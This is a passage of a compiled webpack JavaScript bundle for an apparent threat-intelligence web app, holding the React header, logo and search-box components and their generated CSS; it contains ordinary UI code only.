var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }










var debug = __WEBPACK_IMPORTED_MODULE_4_debug___default()('app:components:App'); // eslint-disable-line no-unused-vars


var cx = __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_8__AppHeader_styl___default.a);













var Header = function (_React$Component) {
  _inherits(Header, _React$Component);

  function Header() {
    var _ref;

    var _temp, _this, _ret;

    _classCallCheck(this, Header);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref = Header.__proto__ || Object.getPrototypeOf(Header)).call.apply(_ref, [this].concat(args))), _this), _this.state = {
      isOpen: false
    }, _this.handleToggleMenu = function () {
      _this.setState({ isOpen: !_this.state.isOpen });
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(Header, [{
    key: 'render',
    value: function render() {
      var _props = this.props,
          loading = _props.loading,
          options = _props.options,
          adminRole = _props.adminRole,
          profile = _props.profile,
          palette = _props.palette,
          isTrialUser = _props.isTrialUser,
          currentBaseRoute = _props.currentBaseRoute,
          enclaves = _props.enclaves;
      var isOpen = this.state.isOpen;

      var showSubmitButton = !__WEBPACK_IMPORTED_MODULE_20_modules_app_constants__["ROUTES_THAT_SHOULD_NOT_HAVE_SUBMIT_BUTTON"].includes(currentBaseRoute) && enclaves.size > 0;

      // TODO REMOVE ADMIN BAN
      return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'div',
        { className: cx('Header', { isAdmin: !!adminRole }) },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          __WEBPACK_IMPORTED_MODULE_2_react_router__["Link"],
          { to: '/browse/reports', className: cx('navLink', 'trustarIcon') },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_6_trustar_icons__["d" /* LogoSplunkTS */], { color: palette.logoFill }),
          adminRole && __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_6_trustar_icons__["i" /* TrustarAdminIcon */], null)
        ),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_13__search_SearchBar__["a" /* default */], null),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          StyledActionsMenu,
          { showAdminRole: !!adminRole },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
            __WEBPACK_IMPORTED_MODULE_19_components_ConnectedDesignProvider__["a" /* default */],
            null,
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
              __WEBPACK_IMPORTED_MODULE_18__browse_components_DropdownWrap__["a" /* DropdownWrap */],
              {
                dropdownCyId: 'dropdown',
                dropdownMenuCyId: 'dropdown-menu',
                direction: 'down',
                openOnClick: true,
                dropdownItemContainerBorderStyle: 'transparent',
                menuItems: [__WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
                  StyledDropdownMenuLink,
                  { key: 1, 'data-cy': 'create-report-link', to: '/create' },
                  __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
                    StyledDropdownWrapMenuItem,
                    null,
                    'Report'
                  )
                ), __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
                  StyledDropdownMenuLink,
                  { key: 2, 'data-cy': 'create-ioc-link', to: '/create/iocs' },
                  __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
                    StyledDropdownWrapMenuItem,
                    null,
                    'Indicator'
                  )
                )] },
              __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
                StyledButtonContainer,
                null,
                showSubmitButton && __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
                  __WEBPACK_IMPORTED_MODULE_16_trustar_2_0_components_Button__["d" /* IconButton */],
                  { icon: __WEBPACK_IMPORTED_MODULE_15_trustar_2_0_components__["s" /* IconLookup */].PLUS, stretched: true, size: 'medium', cyid: 'submit' },
                  'Submit'
                )
              )
            )
          ),
          adminRole && __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
            'span',
            { className: 'adminBanner' },
            '' + adminRole
          )
        )
      );
    }
  }]);

  return Header;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

var StyledButtonContainer = __WEBPACK_IMPORTED_MODULE_7_styled_components__["c" /* default */].span.withConfig({
  displayName: 'AppHeader__StyledButtonContainer',
  componentId: 'sc-1p4080-0'
})(['width:12rem;display:inline-block;']);

var StyledDropdownMenuLink = Object(__WEBPACK_IMPORTED_MODULE_7_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_2_react_router__["Link"]).attrs({
  'data-cy': function dataCy(props) {
    return props.cyId;
  }
}).withConfig({
  displayName: 'AppHeader__StyledDropdownMenuLink',
  componentId: 'sc-1p4080-1'
})(['display:inline-block;']);
//     box-shadow: 0 0 0 1px ${({ theme }) => theme.ThemeColors.BORDER.hex};
var StyledDropdownWrapMenuItem = __WEBPACK_IMPORTED_MODULE_7_styled_components__["c" /* default */].div.withConfig({
  displayName: 'AppHeader__StyledDropdownWrapMenuItem',
  componentId: 'sc-1p4080-2'
})(['&&{font-size:1.167rem;text-align:center;width:11rem;padding:0.75rem 1rem;margin:1px 0 0 0.5rem;box-shadow:3px 3px 11px -8px ', ';border-left:0.5rem solid transparent;cursor:pointer;background-color:', ';color:', ';:hover{border-left:0.5rem solid ', ';background-color:', ';color:', ';}a{color:unset;background-color:unset;}}'], function (_ref2) {
  var theme = _ref2.theme;
  return theme.ThemeColors.BOX_SHADOW.hex;
}, function (_ref3) {
  var theme = _ref3.theme;
  return theme.ThemeColors.SURFACE_LIGHTEST.hex;
}, function (_ref4) {
  var theme = _ref4.theme;
  return theme.ThemeColors.TEXT.hex;
}, function (_ref5) {
  var theme = _ref5.theme;
  return theme.ThemeColors.PRIMARY.hex;
}, function (_ref6) {
  var theme = _ref6.theme;
  return theme.ThemeColors.LIGHT_GRAY_SURFACE.hex;
}, function (_ref7) {
  var theme = _ref7.theme;
  return theme.ThemeColors.TEXT.hex;
});

var StyledActionsMenu = __WEBPACK_IMPORTED_MODULE_7_styled_components__["c" /* default */].div.withConfig({
  displayName: 'AppHeader__StyledActionsMenu',
  componentId: 'sc-1p4080-3'
})(['display:flex;align-items:center;min-width:20rem;position:relative;width:', ';margin-left:', ';.adminBanner{width:8.6rem;font-size:1.25rem;text-transform:uppercase;color:inherit;text-align:right;white-space:nowrap;flex-grow:1;margin-left:-1rem;}'], function (props) {
  return props.showAdminRole ? '28%' : '17%';
}, function (props) {
  return props.showAdminRole ? '2rem' : '18rem';
});

var mapState = function mapState(state) {
  return {
    options: __WEBPACK_IMPORTED_MODULE_10_modules_app__["getters"].options(state),
    profile: __WEBPACK_IMPORTED_MODULE_12_modules_profile__["getters"].profile(state),
    adminRole: __WEBPACK_IMPORTED_MODULE_12_modules_profile__["getters"].adminRole(state),
    isTrialUser: __WEBPACK_IMPORTED_MODULE_12_modules_profile__["getters"].isTrialUser(state),
    palette: __WEBPACK_IMPORTED_MODULE_10_modules_app__["getters"].getHeaderPalette(state),
    currentBaseRoute: Object(__WEBPACK_IMPORTED_MODULE_9_modules_router_getters__["a" /* currentBaseRoute */])(state),
    enclaves: __WEBPACK_IMPORTED_MODULE_11_modules_enclave__["getters"].enclaves(state)
  };
};

var mapDispatch = {};

var mergeProps = function mergeProps(stateProps, dispatchProps, ownProps) {
  return _extends({}, ownProps, dispatchProps, stateProps);
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_3_react_redux__["connect"])(mapState, mapDispatch, mergeProps)(Header));

/***/ }),
/* 3664 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return LogoSplunkTS; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_types__ = __webpack_require__(97);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__LogoWhite_png__ = __webpack_require__(3665);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__LogoWhite_png___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3__LogoWhite_png__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__LogoBlack_png__ = __webpack_require__(3666);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__LogoBlack_png___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4__LogoBlack_png__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_2_0_themes_common__ = __webpack_require__(212);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_app_getters__ = __webpack_require__(182);









// Style for Main Components (things you may export)
var StyledLogoSplunkTS = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].img.withConfig({
  displayName: 'LogoSplunkTS__StyledLogoSplunkTS',
  componentId: 'w82vvq-0'
})(['padding:0 3rem 0 1rem;max-width:22rem;']);

// Bindings


var ConnectedLogo = function ConnectedLogo(props) {
  var logoSrc = props.theme === 'dark' ? __WEBPACK_IMPORTED_MODULE_3__LogoWhite_png___default.a : __WEBPACK_IMPORTED_MODULE_4__LogoBlack_png___default.a;
  //  ----Template----
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(StyledLogoSplunkTS, {
    src: logoSrc,
    alt: 'splunk-trustar logo' });
};

var mapState = function mapState(state) {
  return {
    theme: Object(__WEBPACK_IMPORTED_MODULE_7_modules_app_getters__["theme"])(state)
  };
};

var LogoSplunkTS = Object(__WEBPACK_IMPORTED_MODULE_6_react_redux__["connect"])(mapState)(ConnectedLogo);

/***/ }),
/* 3665 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "LogoWhite.png";

/***/ }),
/* 3666 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "LogoBlack.png";

/***/ }),
/* 3667 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3668);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./AppHeader.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./AppHeader.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3668 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, "/* **************************************************************************\n * NavDropdown\n * *************************************************************************/\n.AppHeader__NavDropdown__b56n8E {\n  position: relative;\n  display: inline-block;\n  font-family: 'SplunkDataSans', 'Helvetica Neue', Helvetica, Arial, sans-serif;\n  font-size: 14px;\n  line-height: 1;\n  z-index: 16;\n}\n.AppHeader__NavDropdown__b56n8E.AppHeader__open__cgulK0 .AppHeader__backdrop__2wOnZR {\n  display: block;\n}\n.AppHeader__NavDropdown__b56n8E .AppHeader__backdrop__2wOnZR {\n  display: none;\n  position: fixed;\n  top: 0;\n  bottom: 0;\n  left: 0;\n  right: 0;\n  background: transparent;\n  z-index: 15;\n}\n.AppHeader__NavDropdown__b56n8E button {\n  font-size: 16px;\n  background: transparent;\n  text-transform: uppercase;\n  letter-spacing: 1px;\n  padding: 0;\n  position: relative;\n  z-index: 16;\n}\n.AppHeader__NavDropdown__b56n8E button i {\n  margin-left: 5px;\n}\n.AppHeader__NavDropdown__b56n8E .AppHeader__toggle__1WzJFX {\n  min-width: 65px;\n  max-width: 150px;\n  margin-left: 0.5rem;\n  display: flex;\n  justify-content: flex-end;\n  white-space: nowrap;\n  position: relative;\n  z-index: 16;\n}\n.AppHeader__NavDropdown__b56n8E .AppHeader__toggle__1WzJFX i {\n  color: #4a4a4a;\n  margin: auto 15px;\n}\n.AppHeader__NavDropdown__b56n8E .AppHeader__toggle__1WzJFX i:first-child {\n  margin-right: 10px;\n  margin-right: 0;\n}\n.AppHeader__NavDropdown__b56n8E .AppHeader__ellipsis__3QE8-_ {\n  text-align: right;\n  color: #4a4a4a;\n  width: 100%;\n  overflow: hidden;\n  text-overflow: ellipsis;\n  white-space: nowrap;\n}\n.AppHeader__NavDropdown__b56n8E .AppHeader__ellipsis__3QE8-_ .AppHeader__profile-icon__p0hLSv {\n  margin: 0;\n}\n.AppHeader__NavDropdown__b56n8E .AppHeader__ellipsis__3QE8-_ .AppHeader__profile-icon__p0hLSv:hover {\n  color: #4a4a4a;\n}\n.AppHeader__NavDropdown__b56n8E .AppHeader__buttonSpinner__1l8Bk4 {\n  display: inline-block;\n}\n.AppHeader__NavDropdown__b56n8E .AppHeader__buttonSpinner__1l8Bk4 .sk-three-bounce > div {\n  background: transparent;\n  width: 8px;\n  height: 8px;\n}\n.AppHeader__NavDropdown__b56n8E .AppHeader__disabled__3WEkrV {\n  -webkit-user-select: none;\n     -moz-user-select: none;\n      -ms-user-select: none;\n          user-select: none;\n  pointer-events: none;\n  cursor: not-allowed;\n}\n.AppHeader__NavDropdown__b56n8E nav {\n  display: none;\n  position: absolute;\n  right: 0;\n  left: -35px;\n  top: 100%;\n  box-shadow: 0px 3px 5px 0px rgba(0,0,0,0.27);\n}\n.AppHeader__NavDropdown__b56n8E a {\n  display: block;\n  text-decoration: none;\n  text-transform: uppercase;\n  text-align: center;\n  padding: 12px 9px;\n  background: #fff;\n  color: #4a4a4a;\n}\n.AppHeader__NavDropdown__b56n8E a:hover {\n  border-left: 4px solid #7989a3;\n}\n.AppHeader__NavDropdown__b56n8E.AppHeader__dark__3G-9pf nav.AppHeader__headerNav__3hcYSI a {\n  color: #fff;\n  background: #111b2a;\n}\n.AppHeader__NavDropdown__b56n8E.AppHeader__dark__3G-9pf nav.AppHeader__headerNav__3hcYSI a:hover {\n  color: #eebd31;\n  border-left-color: #eebd31;\n}\n/* **************************************************************************\n * Header\n * *************************************************************************/\n.AppHeader__open__cgulK0 nav.AppHeader__headerNav__3hcYSI {\n  z-index: 16;\n  display: block;\n}\n.AppHeader__Header__U-jwOq {\n  display: flex;\n  align-items: center;\n  justify-content: flex-start;\n  height: 70px;\n  flex-shrink: 0;\n  flex-grow: 0;\n  font-size: 16px;\n  color: #979ba6;\n  padding-left: 2px;\n  background: #fff;\n  border-bottom: 1px solid #e8ebed;\n}\n.AppHeader__Header__U-jwOq i:hover {\n  color: #fff;\n}\n.AppHeader__Header__U-jwOq a {\n  text-decoration: none;\n}\n.AppHeader__navLink__2GB-nQ {\n  height: 100%;\n  border-radius: 0;\n  color: #979ba6;\n  display: flex;\n  justify-content: center;\n  align-items: center;\n  background: transparent;\n  padding: 0 22px;\n  font-size: 14px;\n  letter-spacing: 1px;\n  position: relative;\n}\n.AppHeader__navLink__2GB-nQ.AppHeader__trustarIcon__1OLtOL {\n  flex-basis: 26rem;\n  justify-content: left;\n}\n.AppHeader__navLink__2GB-nQ:after {\n  content: '';\n  position: absolute;\n  bottom: 0;\n  left: 0;\n  right: 0;\n  height: 4px;\n  background: #7989a3;\n  opacity: 0;\n}\n.AppHeader__navLink__2GB-nQ:hover {\n  background: #fafafa;\n  color: #4a4a4a;\n}\n.AppHeader__navLink__2GB-nQ.AppHeader__trustarIcon__1OLtOL:hover {\n  color: inherit;\n  background: inherit;\n}\n.AppHeader__navLink__2GB-nQ img {\n  margin: 2px 4px 0 0;\n}\n.AppHeader__navLink__2GB-nQ i {\n  font-size: 18px;\n  margin-left: 0;\n}\n.AppHeader__navLink__2GB-nQ i:first-child {\n  margin-right: 10px;\n}\n.AppHeader__active__1K2R_r {\n  background: #fafafa;\n  color: #4a4a4a;\n}\n.AppHeader__active__1K2R_r:after {\n  opacity: 1;\n}\n.AppHeader__flex__iw6ao0 {\n  display: flex;\n  align-items: center;\n}\n.AppHeader__rightNav__4U4PoG .AppHeader__dropDown__3IeYJm {\n  color: #fff;\n}\n.AppHeader__createButton__1XDK1O {\n  color: #fff;\n  text-shadow: 0 -1px 0 rgba(0,0,0,0.15);\n  background-color: #eebd31;\n  font-weight: bold;\n  padding: 6px;\n  text-align: center;\n  display: block;\n  margin-right: 5px;\n  margin-left: 5px;\n  border-radius: 50px;\n  color: #fff;\n  width: 150px;\n  position: relative;\n}\n.AppHeader__createButton__1XDK1O:hover {\n  color: #fff;\n  background: #e1ac13;\n}\n.AppHeader__createButton__1XDK1O.AppHeader__disabled__3WEkrV {\n  -webkit-user-select: none;\n     -moz-user-select: none;\n      -ms-user-select: none;\n          user-select: none;\n  pointer-events: none;\n  cursor: not-allowed;\n  background: #aaa;\n}\n.AppHeader__upgradeButton__27foq5 {\n  font-weight: bold;\n  padding: 6px;\n  text-align: center;\n  display: block;\n  font-size: 14px;\n  color: #11d689;\n  width: 150px;\n  position: relative;\n  margin: 0 -10px;\n  -webkit-user-select: none;\n     -moz-user-select: none;\n      -ms-user-select: none;\n          user-select: none;\n}\n.AppHeader__upgradeButton__27foq5:hover {\n  color: #11a770;\n}\n.dark .AppHeader__Header__U-jwOq {\n  background: #221f20;\n  border-bottom-color: #221f20;\n}\n.dark .AppHeader__navLink__2GB-nQ:hover {\n  color: #fff;\n  background: #0e305d;\n}\n.dark .AppHeader__navLink__2GB-nQ.AppHeader__active__1K2R_r {\n  color: #fff;\n  background: #1c3b7c;\n}\n.dark .AppHeader__navLink__2GB-nQ.AppHeader__trustarIcon__1OLtOL:hover {\n  color: inherit;\n  background: inherit;\n}\n.dark .AppHeader__toggle__1WzJFX .AppHeader__ellipsis__3QE8-_ .AppHeader__profile-icon__p0hLSv:hover {\n  color: #fff;\n}\n.dark .AppHeader__toggle__1WzJFX .AppHeader__adminBanner__2ZBSjM {\n  color: #fff;\n}\n.dark .AppHeader__toggle__1WzJFX i {\n  color: #fff;\n}\n", ""]);

// exports
exports.locals = {
	"NavDropdown": "AppHeader__NavDropdown__b56n8E",
	"open": "AppHeader__open__cgulK0",
	"backdrop": "AppHeader__backdrop__2wOnZR",
	"toggle": "AppHeader__toggle__1WzJFX",
	"ellipsis": "AppHeader__ellipsis__3QE8-_",
	"profile-icon": "AppHeader__profile-icon__p0hLSv",
	"buttonSpinner": "AppHeader__buttonSpinner__1l8Bk4",
	"disabled": "AppHeader__disabled__3WEkrV",
	"dark": "AppHeader__dark__3G-9pf",
	"headerNav": "AppHeader__headerNav__3hcYSI",
	"Header": "AppHeader__Header__U-jwOq",
	"navLink": "AppHeader__navLink__2GB-nQ",
	"trustarIcon": "AppHeader__trustarIcon__1OLtOL",
	"active": "AppHeader__active__1K2R_r",
	"flex": "AppHeader__flex__iw6ao0",
	"rightNav": "AppHeader__rightNav__4U4PoG",
	"dropDown": "AppHeader__dropDown__3IeYJm",
	"createButton": "AppHeader__createButton__1XDK1O",
	"upgradeButton": "AppHeader__upgradeButton__27foq5",
	"adminBanner": "AppHeader__adminBanner__2ZBSjM"
};

/***/ }),
/* 3669 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_react_dom__ = __webpack_require__(65);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_react_dom___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_react_dom__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_react_router__ = __webpack_require__(98);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_7_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_8_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_redux_form_immutable__ = __webpack_require__(180);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_redux_form_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_9_redux_form_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_trustar_icons_Icons__ = __webpack_require__(803);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_trustar_2_0_components_Button__ = __webpack_require__(96);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_trustar_2_0_components__ = __webpack_require__(42);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13__SearchBar_styl__ = __webpack_require__(3670);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13__SearchBar_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_13__SearchBar_styl__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_modules_search__ = __webpack_require__(253);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15_modules_alerts__ = __webpack_require__(400);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_16__utils_route__ = __webpack_require__(3672);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }
















var debug = __WEBPACK_IMPORTED_MODULE_7_debug___default()('app:components:SearchBox'); // eslint-disable-line no-unused-vars


var cx = __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_13__SearchBar_styl___default.a);





var SearchIcon = function SearchIcon(_ref) {
  var _ref$color = _ref.color,
      color = _ref$color === undefined ? '#FFFFFF' : _ref$color,
      props = _objectWithoutProperties(_ref, ['color']);

  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    'svg',
    _extends({
      width: '19px',
      height: '19px',
      viewBox: '0 0 19 19',
      version: '1.1',
      xmlns: 'http://www.w3.org/2000/svg',
      xmlnsXlink: 'http://www.w3.org/1999/xlink'
    }, props),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'g',
      {
        stroke: 'none',
        strokeWidth: '1',
        fill: 'none',
        fillRule: 'evenodd',
        transform: 'translate(-455.000000, -26.000000)' },
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
        d: 'M458.22475,38.735 C455.60175,36.113 455.60175,31.846 458.22475,29.224 C459.53675,27.914 461.25775,27.258 462.97975,27.258 C464.70175,27.258 466.42375,27.914 467.73575,29.224 C470.35775,31.846 470.35775,36.113 467.73575,38.735 C465.11275,41.356 460.84775,41.356 458.22475,38.735 M473.57575,43.686 L469.04675,39.158 C471.72475,36.024 471.58775,31.298 468.62475,28.334 C465.51275,25.222 460.44675,25.222 457.33475,28.334 C454.22175,31.447 454.22175,36.512 457.33475,39.626 C458.89075,41.181 460.93575,41.96 462.97975,41.96 C464.82675,41.96 466.66975,41.318 468.15775,40.047 L472.68575,44.576 C472.80875,44.699 472.96975,44.76 473.12975,44.76 C473.29075,44.76 473.45275,44.699 473.57575,44.576 C473.82175,44.33 473.82175,43.931 473.57575,43.686',
        fill: color
      })
    )
  );
};

var StyledDefaultTooltip = Object(__WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_12_trustar_2_0_components__["i" /* DefaultTooltip */]).withConfig({
  displayName: 'SearchBar__StyledDefaultTooltip',
  componentId: 'sc-1dz8m7y-0'
})(['display:inline-block;max-width:350px;padding:8px;background-color:', ';'], function (_ref2) {
  var theme = _ref2.theme;
  return theme.ColorNames.THUNDER.hex;
});

var FORM_NAME = 'search';

// The field name of the search value in the redux form
var SEARCH_KEY = 'searchText';

// Character limit for partial search. A wildcard search will be performed if the number of characters
// is greater than this limit. For more info, please refer to: https://trustar.atlassian.net/browse/EN-5217.
var NUMBER_OF_CHARACTER_LIMIT = 20;

var SearchBox = function (_React$Component) {
  _inherits(SearchBox, _React$Component);

  function SearchBox() {
    var _ref3;

    var _temp, _this, _ret;

    _classCallCheck(this, SearchBox);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref3 = SearchBox.__proto__ || Object.getPrototypeOf(SearchBox)).call.apply(_ref3, [this].concat(args))), _this), _this.state = {
      focused: false,
      isInReports: Object(__WEBPACK_IMPORTED_MODULE_16__utils_route__["a" /* isReportsPage */])((_this.props.location || {}).pathname)
    }, _this.handleKeyDown = function (e) {
      if (e.key === 'Escape') {
        _this.onBlur(); // Hide shadow box
        // Clear and de-focus input field:
        e.target.value = '';
        e.target.blur();
      }
    }, _this.handleSubmit = function (data) {
      _this.onBlur(); // clear shadow box
      /* $FlowIgnore possibly null value */
      document.activeElement.blur(); // De-focus search input
      _this.props.handleSubmit(data);
    }, _this.onReset = function (e) {
      e.preventDefault(); // Not necessary if button[type='button'] is specified, but it's here to be safe
      _this.onBlur(); // Hide shadow box
      _this.props.reset(); // Reset form
      _this.props.clearSearch(); // Reset search
    }, _this.onFocus = function () {
      _this.setState({ focused: true });
    }, _this.onBlur = function () {
      _this.setState({ focused: false });
    }, _this.focus = function () {
      if (_this.input) {
        // $FlowIssue: The defs for findDOMNode are incorrect in this case
        var input = Object(__WEBPACK_IMPORTED_MODULE_3_react_dom__["findDOMNode"])(_this.input);
        input && input.focus();
      }
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(SearchBox, [{
    key: 'componentDidUpdate',
    value: function componentDidUpdate(prevProps) {
      var _ref4 = prevProps.location || {},
          _ref4$pathname = _ref4.pathname,
